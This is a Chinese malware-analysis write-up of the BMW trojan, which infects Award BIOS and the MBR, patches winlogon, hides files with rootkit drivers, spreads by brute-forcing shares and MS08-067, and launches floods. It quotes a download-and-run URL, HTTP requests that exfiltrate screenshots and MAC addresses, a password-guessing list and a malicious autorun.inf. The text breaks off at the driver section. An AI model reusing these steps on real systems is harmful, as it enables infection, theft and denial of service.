BMW木马样本分析

吴程奕

2011年底和某Hunter的谈话涉及到当时新检测到的病毒BMW,于是有了这篇分析报告.今天打开该目录时,卡巴又报发现病毒,又看到了这片文章.
曾经想象病毒侵入BIOS的危害,果然就出现了BMW,不过幸亏BMW只是用BIOS工具加入了个模块,而不是对BIOS的代码进行更深层次的修改.很久以前,就认为病毒侵入控制系统固件会有更大的社会危害,而修改重烧工业自动化系统的PLC控制器固件的病毒已经见诸报端.
正文
木马包含bios.exe和bmw.exe两个文件，前者负责感染bios和mbr，后者用于可执行文件感染，下载木马等。
一、BIOS感染文件
主要包括：
bios.exe--是BIOS感染主文件.
Flash.dll--用于装载sys文件.
bios.sys--是BIOS驱动服务文件,用于访问BIOS.
my.sys—一个文件驱动hook实现文件.
hook.bin--是BIOS文件和MBRex文件.(MBRex含在BIOS中,便于直接感染)
hook7k.bin---是hook.bin 中的7k内容，由MBRex注入到winlogon/WinInit.
winlogon/WinInit:下载calc.exe并执行.以fileprt服务装载my.sys，原理同使用beep.sys装载bios.sys.
1.1 bios.exe分析
1首先XOR 98h解码代码段中0x1000-0x1500的部分，解出代码段；XOR 89h解码出数据段部分；
2通过进程枚举，如果检测到瑞星或金山杀毒，则弹对话框，并对IME做hook，在用户按键时，执行3；如果没有发现瑞星和金山，直接执行第3步；
3解析参数和检测windows版本，参数主要是-w,-d,-u，其中-u是修复系统，-w和-d不明朗；一般情况下是继续执行感染系统；
4安装BIOS驱动，从资源中抽取出bios.sys，放入系统drivers文件夹；
然后会根据情况采用三种方式来安装BIOS驱动（\\.\bios设备）：
A使用\\.\MyDeviceDriver（注：不是My.sys安装上的，是另一个RootKit）DLL注入技术，将Flash.dll依次注入到services.exe 和Explorer.exe来测试是否安装\\.\bios成功；
B如果A安装不成功，针对有瑞星或KV或WIN7或WIN2008R2版本，则直接LoadLibrary Flash.dll进行bios设备安装；
C大多数情况下，停止beep服务，使用bios.sys代替beep.sys，然后启动beep服务的方式来加载bios驱动安装bios设备，然后使用备份恢复beep.sys文件；
5然后会从资源中释放出过滤驱动My.sys；
6 DeviceIoControl(BIOS, 80102188h,..)来检测是否是Award BIOS，如果是，则DeviceIoControl(BIOS, 80102180h,..)备份当前BIOS为”c:\bios.bin”，打开文件，搜索“hookrom”（hook.bin的内容）来检查当前BIOS是否已经感染，如果没有感染，则从资源中释放出cbrom.exe（Award BIOS工具）和hook.rom（BIOS Patch，含MBR和Winlogon Patch），使用cbrom.exe c:\bios.bin /isa hook.rom将hook.rom作为ISA扩展BIOS添加进BIOS固件（另一个cbrom.exe c:\bios.bin /isa release为卸载扩展BIOS模块），然后使用DeviceIoControl(BIOS, 80102184h,..)将BIOS固件写入Flash中。
如果不是Award BIOS，则使用hook.rom中MBR直接替换原MBR。具体是，读取hook.rom，空过前面0x5D字节（BIOS部分）到MBR代码部分，复制MBRex到局部缓冲区(0x1C00字节，0x0E扇区)；打开\\\\.\\PHYSICALDRIVE0且调整权限，读取MBR扇区到局部缓冲0x0E00处，检查是否感染（“int1” signature），若没有感染，则使用[0x01F8]值初始化[0x0226]（是DayCounter），用0x0F00处0x80字节（从磁盘上读出的MBR部分）覆盖到0x0100处，主要是保存硬盘分区表。然后，将局部缓冲区14个扇区写入磁盘。
至此感染完毕。至于-u恢复，则是相反过程恢复回去。
1.2 flash.dll分析
用于以服务形式加载BIOS.sys, 主要功能在是DllMain中，其余代码是heap实现选择。
DLL_PROCESS_ATTACH DllLoad实现中,通过打开\\.\bios检测是否有Bios驱动，若没有，OpenSCManager =>> CreateService(bios) =>> StartService(bios)；
DLL_PROCESS_DETACH的DllUnload实现中，OpenSCManager =>> ControlService (bios, STOP) =>> DeleteService(bios)
1.3 bios.sys分析
BIOS驱动文件，服务形式，安装\\.\bios设备，用于Ring0访问BIOS。
DriverEntry->DriverEntryImpl =>> IoCreateDevice("\\Device\\Bios")
主要是DriverIoControl，IOCTL_CODE有三个：
80102180h --- BackupBIOS
80102184h --- BurnBIOS
80102188h --- CheckBIOS
CheckBIOS流程：
使用MmMapIoSpace map BIOS物理地址[0x0F0000+0x10000] to liner space，然后搜索字符串“$@AWDFLASH”确定是否Award BIOS；找到后，在其后0x2A处，找SMI_PORT保存；然后通过 “_MS_”和“IMD_”辅助找到BIOS_SIZE并保存。
BackupBIOS流程：
MmMapIoSpace map BIOS物理地址[0x0F0000+BIOS_SIZE] to liner space =>> ZwCreateFile(dosdevicesc:/bios.bin" style="color: rgb(51, 102, 153); text-decoration: none; ">\\DosDevices\\C:\\bios.bin) =>> ZwWriteFile。
BurnBIOS流程：
ZwCreateFile(\\DosDevices\\C:\\bios.bin) =>> ZwReadFile到ExAllocatePoolWithTag分配的缓冲区中；擦除Flash，将缓冲区中内容编程到Flash中；释放缓冲，关闭文件。
EraseFlash流程：
首先，写"$SMI"到EBP寄存器，然后OUT 0x29到SMI_PORT（是扩展端口）,适当延时（应当延时相对比较长时间？），检测EBP是否TOGGLE为“SMI$”，若是，擦除成功。
ProgramFlash流程：
分页，每次编程16字节；依次编程；use page auto increament。
页编程流程：
首先，写"$SMI"到EBP寄存器，然后OUT 0x2F到SMI_PORT（是扩展端口）,适当延时，检测EBP是否TOGGLE为“SMI$”，若是，页编程成功。
1.4 my.sys分析
IoCreateDevice(\\Device\\hide)钩到\\Device\\Harddisk0\\DR0的驱动disk.sys，对READ、WRITE、DEVICEIOCONTROL的DISPTACH进行HOOK，阻止MBRex扇区部分被读取和修改。在WINLOGON的感染代码里my.sys以fileprt服务的名义被加载。
DriverReadHook:
判断如果是读前63个扇区，则设置完成例程DriverReadCompletionRoutine，若不是，调用原读例程正常读；
DriverReadCompletionRoutine会根据读模式，找到相关缓冲区，清零，使这样无法读取MBRex（14扇区）所在的扇区。
DriverWriteHook:
根据写模式，得到相关缓冲区，如果是写前14扇区，则需要偏移0x100处的FBFBECECFCFCEBEBh的Signature作为口令（MBR中0x100处即为这些数值）可以调用原写例程写入；否则IofCompleteRequest with STATUS_SUCCESS；若是15-63扇区，直接IofCompleteRequest with STATUS_SUCCESS；其余扇区，调用原写例程正常写；
DriverIoControlHook:
对于IOCTL_DISK_GET_DRIVE_LAYOUT_EX、IOCTL_STORAGE_GET_MEDIA_TYPES_EX、IOCTL_DISK_GET_DRIVE_GEOMETRY_EX直接IofCompleteRequest with STATUS_UNSUCCESSFUL；其余IOCTL CODE正常。
1.5 hook.bin分析
第一字0xAA55表示该BIOS模块是Expansion BIOS模块；第三字节(偏移0x02)是扩展BIOS模块的大小,其后是指令jmp bios_start；
isa_main在0x1C5D处，bios_start在0x5D处，中间0x1C00字节是MBRex（含Winlogon感染代码）。
第一条指令将0x5D弹出到ax中，然后用0x5D-0x1C5C内容覆盖0x7C00[+0x1C00](BIOS load MBR的地址)，这样BIOS初始化完毕后，将控制权交给MBR时，被修改的MBRex取得控制权。
然后使用扇区扩展读BIOS中断，读取MBR(磁盘第一扇区)，判断是否感染（'1tni'标记），若没有被感染则拷贝后0x80字节（含硬盘分区表）到0x0100[+0x80]，使用扇区扩展写BIOS中断写14个扇区完成感染。
最后，retf指令返回，return to the caller in bios calling rel_0003?
1.6 hook7k.bin即MBRex.bin分析
首先，把自身MBR部分（第零扇区）拷贝到0x0600，然后跳转到0x061E；0x061E代码是读磁盘1-6扇区(zero-based)到0x7C00，然后跳转到0x7C00执行；
0x7C00(即第一扇区，0开始编号)处是一条相对跳转指令 jmp 0x7CA0；0x7CA0（ebr_strap）处代码把1-6扇区拷贝到0x0600处，然后跳转到0x06BF(ebr_main)处执行；
ebr_main首先会读CMOS获取日期，用于病毒运行天数计数；然后把7号扇区(即被感染计算机的原MBR)读取到0x4000缓冲区，从其中的分区表中找启动分区并找到启动分区的起始扇区（DBR），读取DBR到0x7C00；
根据BPB判断文件系统，如果是NTFS，从$MFT开始寻找Winlogon/WinInit,找到后判断是否感染（'snnc' signature），如果没有感染，则设置感染标志'snnc'保存原entrypoint，拷贝8号扇区开始的Winlogon感染代码560字节到Winlogon被感染指令处；显示“Find It OK!”，然后跳转到0x4000处(原来好的MBR处)执行原MBR，完成原有的启动流程；
若是FAT32格式文件系统，根据FAT表找到Winlogon，找到后判断是否感染，保存原entrypoint，设置新EP为0x1C00(除去两扇区PE头，恰好是第8号扇区所在位置，文件中偏移0x1000)，修正PE文件头；若簇小于8扇区，则首先写入文件头，然后读入第八扇区开始的6个扇区写入Winlogon；若簇大于8扇区，则将第8号扇区开始6个扇区直接覆盖Winlogon的第八扇区开始的6个扇区，然后一簇写回，完成Winlogon感染。然后将0x4000处原MBR拷贝到0x7C00处，跳转到原MBR执行启动。
注：Winlogon的.text段RVA=0x1000,PA=0x0400；文件头占两个扇区。0x1000+(0x1000-0x0400) = 0x1C00.
第0x0D号扇区（hook7k.bin最后一个扇区）还有一段代码，用途不明.SEH内容居多。
1.7 winlogon.exe分析
从hook7k.bin的第八扇区即偏移0x1000开始Patch到Winlogon，经过简单加密，自解密运行。
首先解出代码，然后加载库Urlmon.dll和Advapi32.dll，解析用到的函数地址；
创建线程，使用URLDownloadToFile下载http://xx.3515.info:806/test/91/calc.exe保存为c:\calc.exe，使用WinExec运行；
然后，OpenSCManager =>> CreateService(fileprt, my.sys, …) =>> StartService(fileprt)安装HRADDISK驱动的钩子，作用详见my.sys分析。
二、BMW.exe感染文件
Bmwexe采用aspack加壳，很容易脱去；
Upx0和upx1两个section，不是UPX壳，好像是调用的VM？通过静态分析函数调用关系，还是可以分析出顶层的函数主要有两个。
从start处分析，木马首先使用VirtualQueryEx和GetModuleHandle判断是运行在exe中还是dll中；然后分别调用了许多垃圾代码的入口，猜测以上两个顶层入口分别是运行在exe或dll中的入口，标号分别是RootFuncRunningInExe和RootFuncRunningInDll。使用硬件断点可以验证猜测。
RootFuncRunningInExe流程
这个函数主要是为ServiceDLL服务代码准备运行条件，运行ServiceDLLs；使用命名管道和Event与ServiceDLL通讯。
1首先VirtualAlloc一个4000000h的大缓冲，然后用nop.nop.nop加最后一条jmp rel32（下一条指令）填充，执行（原因不明朗，难道是为了延时？）,然后VirtualFree返回。
2判断自己是否运行在可移动设备中，若是，则创建进程执行"explorer /n,X:\"打开磁盘，可以运行其中的uninstall.exe病毒，等待进程结束返回；
3 字XOR解码PIPE名，格式是\\.\pipe\{________guid_________}，句柄记为hPipe；创建Event Global\{6581F932-EEC4-422e-A5FD-0F78BB508683}，句柄记为hEvent8683；打开管道文件（OPEN_EXISTING），如果是系统启动之内60s，会不停尝试打开，第一次运行，肯定是无法打开的；
4 创建文件“C:\\Documents and Settings\\Infotmp.txt”或“C:\\Users\\Infotmp.txt”（Vista以上版本）；
5 枚举进程比较文件名，检测自身是否运行在Explorer或者以下杀软进程中：
RavMonD.exe，360tray.exe，MPSVC.exe，KSafeTray.exe，RsAgent.exe，avp.exe，Explorer.exe
若存在这些进程中，则得到进程ID；如果是存在RavMonD.exe中，为了不被用户发觉，会启动RsAgent.exe小狮子进程；使用随机数和进程号产生"%.8X.tmp"格式字符串（进程号在低四位），作为system32下的文件名，使用随机数"%.8X.log"格式串，作为拷贝屏幕JPG图片文件名，在TempPath目录下。
6 将GetVersionEx得到的VersionInformation、自身EXE是否杀软BITMAP、是否拷屏、自身EXE文件名、自身进程ID、进程ID字符串、JPEG文件名、RavMonD进程ID等信息写到文件Infotmp.txt中，供DLL运行时读取；
7 当exe文件不是在可移动存储上时，拷贝屏幕，使用GdiPlus编码为Jpeg图片流，并保存为“$TEMP\%.8X.log”文件；
8 创建Event Global\{49DC5E00-FB89-41c2-8E1E-852B0B0C6B00}，句柄记为hEvent6B00，将自身内容读到缓冲区中，修正PE Hdr标志位为DLL格式，获取sfc_os.dll中SetSfcFileException函数指针，用于暂停系统文件保护以替换文件；针对解码出的下列服务和对应文件(未列出全部)执行OpenService，QueryService，StopService，用缓冲区内容覆盖文件内容，StartService，WaitForSingleObject(hEvent6B00)等待替换后的服务（该服务会SetEvent(hEvent6B00)），然后CloseServiceHandle。
"AppMgmt","BITS","FAstuserSwitchingCompatibilty","WdmmPmSN","XmlProv",……
"appmgmts.dll","Qmgr.dll","shsvcs.dll","mspmsnsv.dll","XmlProv.dll",……
如果上述解码没有解出任何字符串,则使用HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost注册表项netsvcs键的键值(服务名列表) ,循环执行以下操作CreateService("System32\\Svchost.exe -k netsvcs"),用“服务名.dll”形成文件名（如BITS服务，则为BITS.dll），然后将该服务的注册表项的ServiceDll设置为相应的dll文件名,将缓冲区内容写入文件，然后StartService同样等待WaitForSingleObject(hEvent6B00)完成或超时。
关闭相关句柄，返回。
第一次运行实例执行完毕。
运行在DLL中时，分为由Svchost -k service启动的服务和普通DLL运行的形式。
由Svchost启动的Service DLL的执行流程
这个是病毒的运行主体部分。
1首先创建并设置Event hEvent6B00通知第一次运行实例，服务已经运行；从文件Infotmp.txt中读取信息，并删除文件；如果文件不存在或打开失败，则重新获取相关信息；尝试删除创建本服务DLL的原实例EXE程序文件200次（因为EXE会启动多个DLL，每个都会尝试删除）；
2 获取自身Module文件名，解码出本身的服务名；加载Psapi.dll并解析出GetModuleInformation的地址，调用得到MODULEINFO.SizeOfImage；
3 解码出杀软程序名字符串列表；打开\\.\poxity设备准备通信，如果打开成功，根据情况恢复系统、卸载驱动，然后重新装载驱动（有个DOWRD值为2时，由Exe生成的Infotmp.txt拷贝过来，具体意图还不清楚，可能是某些原因不匹配）或者使用原驱动；如果打开设备失败，则装载服务安装设备。具体是使用32bit随机数生成nnnnnnnn字符串做为服务名，system32\nnnnnnnn.sys做文件名，从自身释放出类型为“FILE”、资源名为65h的资源并解码写入到nnnnnnnn.sys文件，然后创建并启动服务；尝试20次打开\\.\poxity设备；
4 创建线程ThreadHttpSendJpegFile将图片编码到流中向服务器传送拷屏JPEG图片。
GET /passport.asp?ID=1&fn=1_00-0C-29-XX-XX-XX&Var=00000001 HTTP/1.1
Accept: */*Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT 5.1; SV1)
Host: 204.45.123.173
Connection:Keep-Alive
5 然后传入驱动使用的一些函数地址和变量，并得到内核KiServiceTable的地址和NumberOfService。具体是，通过ntdll!ZwQuerySystemInformation遍历系统加载模块列表，其中第一个模块就是ntoskrnl，得到其文件名和在内核的加载基址；然后在用户态loadlibrary(ntoskrnl_name)，获取KeInsertQueueApc、KeInitializeApc、MmFlushImageSection、IoGetAttachedDevice、PsTerminateSystemThread、MmGetSystemRoutineAddress函数地址，使用PsTerminateSystemThread函数地址和特征指令搜索PspTerminateThreadByPointer VA，使用KeInsertQueueApc函数地址和特征指令搜索KiInsertQueueAPC VA；然后保存这些函数的前0x0C字节指令，根据函数用户态加载VA和内核台基址得到在内核的地址；得到不同版本平台的ThreadListHeadOffsetInEPROCESS和ThreadListEntryOffsetInETHREAD；将这些信息通过IOCTL=0x222407传递给驱动，驱动同时会给出内核KiServiceTable的地址和NumberOfService（注：这两个参数直接通过InputBuffer传出，和poxity驱动通信缓冲区并不严格遵循常见输入输出缓冲区模式）。驱动会使用MmGetSystemRoutineAddress得到用到的函数地址，使用PsTerminateSystemThread、ThreadListHeadOffsetInEPROCESS和ThreadListEntryOffsetInETHREAD结束线程；传入的其余几个函数会被inline hook。
6 在用户态下获取KiServiceTable表格，恢复被inline hook的函数。
具体做法是，使用驱动返回的内核基址和KiServiceTable在内核中的Addr，得到偏移KiServiceTableOffset；看是否则合理的范围内，此处源码有点bug，jb应该为jl，即合理地址范围转拷贝代码；
若地址范围不合理，则Ring3下，得到加载后的ntkrnlpa.exe的KeServiceDescriptorTable的地址，转换成KeServiceDescriptorTableVA（VA ImageBase based，为什么加载后不是以LoadedAddr重定位而仍是以ImageBase？），在INIT section代码空间中搜索KeServiceDescriptorTableVA以定位指令
MOV ds:_KeServiceDescriptorTable, offset _KiServiceTable，得到KiServiceTable的ImageBase based地址，KiServiceTableVA-ImageBase得到偏移KiServiceTableOffset。此处代码也有bug，搜索范围不对导致搜索不到，修正为直接搜索INIT section范围即可。
得到KiServiceTableOffset后，使用Module Loaded基址定位到KiServiceTable loaded VA，拷贝整个KiServiceTable保存，然后使用内核基址修正每个Entry，使用IOCTL=0x22240B恢复SSDT；
7 针对杀软，通过进程枚举，得到AV ProcId，向驱动发送IOCTL=0x222418，驱动枚举目标进程所有线程，使用PspTerminateThreadByPointer结束线程；
8 向驱动发送IOCTL=0x222424和本进程ID，阻止线程创建和中止通知，本实现只阻止线程中止通知。
9 IFEO劫持杀软。具体是，针对解码出的列表中的每个AV注册表项HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IFEO\AV_Name，"Debugger"键值都设置为"ntsd -d"；是通过IOCTL=0x22241C实现的。
10 Hook tcpip.sys
用途是阻止某些域名的解析，详细参见poxity IOCTL=0x22242C。
11 使用IOCTL=0x22240F隐藏本身DLL module；使用IOCTL=0x22241C设置本身服务HKLM\SYSTEM\CurrentControlSet\Services\ServiceName “Start”启动方式为2（2为自动，3为手动，4为禁止），IOCTL详见poxity分析；如果，poxity不存在，则直接调用SHSetValue设置启动模式为自动。调用SHSetValue设置HKLM\SYSTEM\CurrentControlSet\Control\Windows键值"NoPopUpsOnBoot"为1，阻止服务启动出错时弹出系统错误报告。发送IOCTL=0x222420给驱动，隐藏服务的注册表项。
12 发送IOCTL=0x222413、文件系统设备名和自身文件名给驱动，由驱动hook文件系统驱动，隐藏DLL文件；发送IOCTL=0x222417由驱动返回驱动文件名；发送IOCTL=0x222413、文件系统设备名和驱动文件名给驱动，隐藏驱动文件。
13 然后创建三个线程，标记为thread1，thread2，thread3.
Threa1--DelSafeBootMinNetAndRepeatGenSelfnDrv
首先删除注册表项
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKLM\SYSTEM\CurrentControlSet\ Control\ SafeBoot\Network
然后发送IOCTL=0x222430到驱动， hook FileSystemDriver的MajorFunction[IRP_MJ_CARETE]和MajorFunction[IRP_MJ_DIRECTORY_CONTROL]两个Dispatch,作用详见poxity分析。
从驱动得到驱动文件名，读取驱动文件到缓冲区DriverSysBuffer；把模块自身读到缓冲区SelfFileBuffer；循环每隔1s覆盖一次模块自身的内容，驱动文件由于原程序文件名是空，没有被覆盖，好像是bug。
Thread2---TerminateIfWorkHasDoneByOtherOrSleepFor1
使用命名管道\\.\pipe\{________guid_________}和EXE程序通信，负责命名管道的创建，系统中只允许一个该命名管道实例。
首先使用CreateFile+OPEN_EXISTING测试管道是否存在，如果CreateFile成功GetlastError返回ERROR_SUCCESS，说明已有ServiceDLL运行形式存在，命名管道已经创建，而且EXE程序还没有打开管道，则让第一个ServiceDLL运行，线程退出；
如果CreateFile失败且GetLastError返回ERROR_PIPE_BUSY(0xE7)说明已有ServiceDLL运行形式存在，命名管道已经存在，而且EXE中代码正在使用管道，则线程退出；
如果CreateFile失败，GetLastError返回不是ERROR_SUCCESS或ERROR_PIPE_BUSY，最有可能是ERROR_FILE_NOT_EXISTING，则标明是第一个ServiceDLL执行，则使用CreateNamedPipeA创建命名管道，只允许一个实例；然后会进入一个循环，使用管道接收来自EXE执行的0x10字节命令，直至接收到退出命令，则准备退出。
所以命名管道的主要作用是保证一个ServiceDLL实例在运行，结束掉其余ServiceDLL实例中的线程；接收到EXE的退出控制命令后，结束本进程内线程。
结束线程前的检测并做恢复工作如下：
A. 发送IOCTL=0x222428通知驱动恢复系统；
B. 如果模块名和服务名相同，则删除HKLM\SYSTEM\CurrentControlSet\Services\ServiceName键值；如果不同，则将其下“Start”子键设置为禁止（4）；
C. 枚举本进程内的所有线程，TerminateThread，使用0xE1F27272 NormalContext阻止系统通知（检查A中是否已经恢复，还能阻止吗？）；
D. 释放分配的本模块内容、用于Exe的模块内容、驱动内容三个缓冲区；
E. 结束线程。注其堆栈内容和调用：
UnPackEr:00403EB9 push 0
UnPackEr:00403EBB push 0
UnPackEr:00403EBD lea eax, lpMultiByteStrFileSelf
UnPackEr:00403EC3 push eax
UnPackEr:00403EC4 push ds:ExitThread
UnPackEr:00403ECA push [ebp+hNamedPipe]
UnPackEr:00403ED0 push ds:DeleteFileA
UnPackEr:00403ED6 push ds:CloseHandle
UnPackEr:00403EDC retn
CloseHandle(hNamedPipe);
DeleteFileA(lpMultiByteStrFileSelf);
ExitThread(0);
Thread3---CreateMainWorkThreads
作用是创建一系列线程； www.2cto.com
首先调用WriteLocalhostOverrideHostFile将'127.0.0.1 localhost\r\n'只一行写入到hosts文件。
创建线程RecurseLogicalDriveToInfectNlsArchive
针对每个逻辑驱动器创建一个线程，递归、深度优先遍历每个驱动器上的文件，此过程中没有使能exe文件感染，只是将搜索到的非系统Temp目录下的rar包文件名以链表保存起来，该链表操作代码使用Event互斥，保证链表线程安全；
WaitForMultipleObjects各个遍历线程结束后，使能exe文件感染，创建线程，主要是使用RAR文件名链表解压大小在2800h～0A00000h之间的文件到系统temp目录，感染其中的exe文件，重新压缩替换原来文件。
会将一些目录排除在搜索和感染范围，如“WINDOWS”,“WINNT”，“Documents and Settings”，“System Volume Information”，……,列表不尽详述。
该线程首先读取c_312747.nls文件内容，其内容是6个字节一组的记录，每一个记录对应一个RAR文件；前四个字节是rar文件名的HASH值，后两个字节用于和全局变量unk_413D28两个字节作比较，结构如下
Struct
{
DWORD dwRarNameHash;
WORD wUknown;
};
如果有新RAR文件出现，则找不到对应dwRarNameHash，解压感染后在文件末尾增加该记录；如果dwRarNameHash相同且wUknown>unk_413D28处的字，则解压感染后用新的记录替换掉原来记录；dwRarNameHash相同且wUknown<=unk_413D28处的字,则不解压感染文件。wUknown类似版本号。
文件感染部分分为一小段0x02E1字节的跳转代码和本身二进制文件组成，根据PE文件计算各参数，填充0x02E1字节代码中运行时填充字节，修正原entrypoint，将0x02E1和本身内容填充到原exe文件末尾，完成感染。
感染前，有一调用判断，进入垃圾代码返回，不知用途。
创建线程MakeDriveAutorunUnstallForRemovableDevice，主要功能是每个1s检测系统逻辑盘；在可移动逻辑盘上创建autorun.inf文件和uninstall.exe文件，双击盘符自动运行，autorun.inf内容大致如下：
[autorun]
OPEN=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\uninstall.exe
shell\open=打开(&O)
shell\open\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\uninstall.exe Show
shell\open\Default=1
shell\explore=资垂芾砥?&X) =>应该是资源管理器(&X)
shell\explore\Command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\uninstall.exe Show
autorun.inf和recycle.{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\文件夹和uninstall.exe都设置系统、隐藏、只读属性。
uninstall.exe是木马自身可执行文件副本。
然后在系统重启后需要等待1小时继续创建线程。
创建线程GetIpAddrOfwwwxxxxxinfo
每隔一分钟解析一个www.%s.info域名的外网地址。
创建两个线程EvilFunctionToolKit(5)和EvilFunctionToolKit(1)，分别以img/up.jpg和****为url从HTTP服务器下载两个exe可执行文件，估计是两个木马，创建进程执行。
创建线程IEOpenURLMacHtm使用IE打开URL http://xxx.xx.123.170:8080/htm/mac.htm?1。网页已经无法打开。
创建线程InfectTheSubNetMachines(1)，攻击内网子网内的计算机。首先使用www.baidu.com测试网络连接，然后使用socket(AF_INET,SOCK_RAW,IPPROTO_ICMP)ICMP探测一个范围内(如"xxx.xx.123.170-174")的主机是否可达，保存此主机用于下载http://xxx.xxx.xxx.xxx:8080/msdownload/update/v5/setup.exe。然后WNet枚举网络资源，用建立desktop.txt尝试是否有写权限，然后感染该文件夹，形成rar包记录。
然后针对子网内计算机进行遍历，若主机可达，拷贝自身exe可执行文件到\\pipe\ipc$或\\pipe\C$，设置AT定时执行。WNetAddConnection2A(\\pipe\ipc$或\\pipe\C$)时，会使用下列用户名和密码列表进行猜测：
User：Administrator.Guest.admin.Root
Password: 1234.password.6969.harley.123456.golf.pussy.mustang.1111.shadow.1313.fish.5150.7777.qwerty.baseball.2112.letmein.………
然后使用MS08-067命名管道漏洞进行攻击。首先用\\xxx.xxx.xxx.xxx\pipe\browser试探，TransactNamedPipe ShellCode进行攻击。
上述过程，每隔10分钟循环一次。
创建线程InfectTheSubNetMachines(2)，遍历外网子网计算机地址，使用MS08-067命名管道漏洞进行攻击。
创建线程EvilFunctionToolKit(3)，从服务器列表选择可用的使用相对URL dl/1.rar下载一个木马文件数据库，解密数据。根据本地的一个要运行的木马名称列表，从该文件数据库中抽取出木马，存为文件运行。
创建线程HttpSendMACetcInformation，把系统MAC地址传送出去，以HTTP GET的方法实现，内容为
"GET /ttt/tongji.asp?ver=101010&tgid=1&address=00-0C-29-25-A5-BB&flag=17b342d996799e26fd44a9bb4f81cd51&alexa=0&List=NULL HTTP/1.1",CR,LF,"Accept: */*",CR,LF,"Accept-Language: zh-cn",CR,LF,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.)
创建线程AttackTargetBlood，使用EvilFunctionToolKit(4)从服务器msdownload/update/wuredirtetcpa1.txt下载的文件控制本机向目标机发动网络洪水攻击。
该文件解密后格式(复制不上,此处从略).
前三个DWORD用于解密。
首先，创建NumOfHttpSvrRecord个线程，使用HTTPSvrRecord参数从每个服务器上下载文件，删除文件；该文件并没有使用。
Typedef struct _tagHTTPSvrRecord
{
} HTTPSvrRecord;
然后，使用IOCTL=0x222434命令驱动HookNdis（只对XP和2k3有效），然后攻击目标机：
A．创建大量socket(AF_INET, SOCK_STREAM, IPROTO_TCP)，无论NDIS是否被Hooked，因为不是SOCK_RAWIP，IP_HDR[PROTO]字段不为0，所以NdisMSendHandlerHook不会起作用；connect时会建立大量的正常的TCP连接，然后send发送一个字，形成大量小包。该过程使用下面InnocenceBloodControlBlock结构控制。
Typedef struct _tagInnocenceBloodControlBlock
{
} InnocenceBloodControlBlock;
在NdisHooked的情况下，创建socket(AF_INET，SOCK_RAW，IPPROTO_IP)直接填充IP包，首先发送TCP_SYN建立大量半连接；然后发送UDP包，UDP数据为伪造的源IP，会被NIDS MSendHandlerHooked用来作为IP头的Source IP，形成IP欺骗，隐藏自己。仍然由上述InnocenceBloodControlBlock结构控制攻击。
B. 创建socket(AF_INET，SOCK_DGRAM，IPPROTO_UDP)，进行由DNSQryControlBlock控制进行的DNS解析，有三种形式：使用DNSQryControlBlock.DestIpAddrArray数组中的地址作为DNS服务器地址解析DNSQryControlBlock.szIP；使用DNSQryControlBlock.DestIpAddrArray数组中的地址作为DNS服务器地址解析一系列www.xxxx.[DNSQryControlBlock.szInfoComNetOrgetc]域名；使用本主机的DNS解析一系列www.xxxx.[DNSQryControlBlock.szInfoComNetOrgetc]域名。
Typedef struct _tagDNSQryControlBlock //size is 0xC0.
{
} DNSQryControlBlock;
C．创建线程，解析一系列缓冲区，搜索其中“javascript”、“mailto”、http://等关键字,找邮箱地址和域名，发送到HrefControlBlock.szIP服务器。具体用途不明，HrefControlBlock结构暂时不明。
Typedef struct _tagHrefControlBlock //size is 0x9C.
{
+0x00 CHAR szIp[0x40];
………
} HrefControlBlock;
14删除EXE生成的用于记录其进程ID的system32\nnnniiii.tmp文件（当病毒在杀软EXE中运行时，会生成此文件，以记录杀软ID，是iiii四位）；
15进入死循环，500ms周期性执行.
如果有新的infotmp.txt生成，说明有新的实例运行在exe中，则读取信息，然后删除Infotmp.txt文件；针对AV列表，枚举进程检测这些AV是否存在，若存在，则发送IOCTL=0x222418和其进程ID，由驱动结束杀软内所有线程。
以注入DLL形式的执行流程
解析传送进的文件名字符串参数，文件名应该是nnnniiii.tmp形式，其中iiii是杀软或者Explorer.exe的进程ID（该文件由在EXE中运行的实例产生,在EXE中可能有主线程和普通线程两种地位形式？）；与本进程ID号比较，若匹配则执行以下部分，不匹配则ExitThread退出线程。
1 创建Event {00C92B91-763E-4a4e-8404-29ED1850790B}，标记为hEvent790B，设置事件；
2 如果没有poxity设备，则安装驱动服务；
3 如果文件Infotmp.txt不存在，则自己检测系统版本和杀软信息；
4 如果检测到微点杀毒MPSVC.exe，则发送IOCTL=0x222407 Inline hook SSDT；然后枚举进程得到进程ID，发送IOCTL=0x222418由驱动使用PspTerminateThreadByPointer结束微点。
5 以前面所述相同的替换一系列系统服务的形式，运行病毒。
最后结束执行。
【注】最后为什么会是如下形式：
UnPackEr:004021B9 push 0
UnPackEr:004021BB push 0
UnPackEr:004021BD push ds:hModule------------+
UnPackEr:004021C3 push ds:ExitThread |
UnPackEr:004021C9 push ds:hModule |
UnPackEr:004021CF push ds:FreeLibrary |
UnPackEr:004021D5 push ds:hModule |
UnPackEr:004021DB push ds:FreeLibrary |
UnPackEr:004021E1 push ds:hModule |
UnPackEr:004021E7 push ds:FreeLibrary |
UnPackEr:004021ED push ds:hModule |
UnPackEr:004021F3 push ds:FreeLibrary |
UnPackEr:004021F9 push ds:hModule |
UnPackEr:004021FF push ds:FreeLibrary |
UnPackEr:00402205 push ds:hModule |
UnPackEr:0040220B push ds:FreeLibrary |
UnPackEr:00402211 push ds:hModule |
UnPackEr:00402217 push ds:FreeLibrary |
UnPackEr:0040221D push ds:hModule |
UnPackEr:00402223 push ds:FreeLibrary |
UnPackEr:00402229 push ds:hModule |
UnPackEr:0040222F push ds:FreeLibrary |
UnPackEr:00402235 push ds:FreeLibrary <------+
UnPackEr:0040223B retn
难道是push 0 push 0 调整了堆栈，从而调整了ExitThread返回地址，能接着下面的代码执行. 多次FreeLibrary是安全设计，还是hModule前部分已经被清空，故意引起程序出错？可能是没有FreeLibrary，不可能会是引起程序出错。

Poxity设备驱动：
由bmw.exe释放出来，放在system32目录下，名字是nnnnnnnn.sys（nnnnnnnn是8位十六进制随机数）。主要IOCTL和功能描述如下：
0x222407:
